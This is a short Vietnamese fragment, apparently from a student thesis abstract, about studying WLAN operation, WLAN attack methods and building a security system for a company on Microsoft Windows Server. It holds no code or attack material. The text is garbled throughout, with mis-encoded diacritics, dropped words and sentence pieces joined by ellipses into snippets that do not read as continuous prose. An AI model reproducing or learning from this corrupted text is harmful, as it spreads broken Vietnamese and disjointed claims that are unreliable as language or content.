rủi ro tính chất bảo mật. .. động mạng WLAN, nghiên cứu phƣơng pháp công giải pháp bảo mật, sở xây dựng hệ thống bảo mật tốt cho cơng ty Phƣơng pháp nghiên cứu Dựa hệ thống windows server Microsoft ta xây dựng hệ thống bảo mật. .. sài gòn HT phục vụ cho việc kinh doanh cơng ty, tơi có đƣợc kiến thức mạng WLAN nhƣ ƣu nhƣợc điểm, chế hoạt động, phƣơng thức công bảo mật WLAN, đồng thời xây dựng đƣợc chế bảo mật cho công ty